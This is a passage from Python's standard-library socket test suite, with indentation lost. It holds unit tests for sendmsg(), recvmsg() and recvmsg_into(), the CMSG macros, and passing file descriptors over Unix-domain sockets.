# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
